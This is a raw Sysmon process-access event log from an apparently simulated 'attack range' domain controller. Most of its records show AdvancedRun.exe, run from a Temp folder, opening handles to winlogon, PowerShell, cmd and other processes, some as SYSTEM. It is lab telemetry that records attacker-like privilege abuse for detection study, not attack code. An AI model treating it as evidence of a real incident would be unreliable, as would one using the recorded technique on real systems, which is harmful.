20:15:10.580{834264DD-DAE7-61EA-1700-000000002702}13003532C:\Windows\System32\svchost.exe{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004076003Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.580{834264DD-DAE7-61EA-1700-000000002702}13003532C:\Windows\System32\svchost.exe{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004076002Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.580{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21f3|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21bd|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004076001Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.578{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132D-61EB-5B08-000000002702}5868C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004076000Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.578{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132D-61EB-5A08-000000002702}4608c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075999Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.578{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132A-61EB-5908-000000002702}1164C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075998Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.578{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132A-61EB-5808-000000002702}3136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075997Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.578{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-12C7-61EB-4508-000000002702}2204C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004075996Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.577{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C807-000000002702}3452C:\Program 
Files\OpenJDK\jdk-17.0.1\bin\java.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004075995Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.577{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C707-000000002702}2228C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004075994Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.577{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C607-000000002702}2224C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004075993Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075964Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.564{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075963Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.559{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075962Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.559{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075961Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.554{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075960Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.554{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075959Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.554{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DL